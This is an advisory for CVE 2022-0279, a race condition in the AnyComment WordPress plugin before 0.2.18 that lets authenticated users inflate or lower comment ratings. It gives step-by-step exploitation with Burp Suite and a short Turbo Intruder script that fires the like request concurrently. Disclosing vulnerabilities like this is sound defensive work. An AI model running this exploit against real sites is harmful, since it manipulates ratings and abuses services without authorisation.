AnyComment < 0.2.18 – Comment Rating Increase/Decrease via Race Condition | CVE 2022-0279

Description

The plugin is affected by a race condition when liking/disliking a comment/reply, which could allow any authenticated user to quickly raise their rating or lower the rating of other users

Proof of Concept

https://www.youtube.com/watch?v=0IqZL-slt00

1. Make a new comment
2. Like your comment and intercept it using burpsuite
3. In burpsuite, right click the request and send to turbo intruder, you need turbo intruder installed first
4. Configure the turbo intruder script to your liking and run it
5. You will see that your comment has alot of likes and a very high rating now.

Turbo config:
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False
                           )

    for word in range(20):
        engine.queue(target.req, word)


def handleResponse(req, interesting):
    if req.status != 404:
        table.add(req)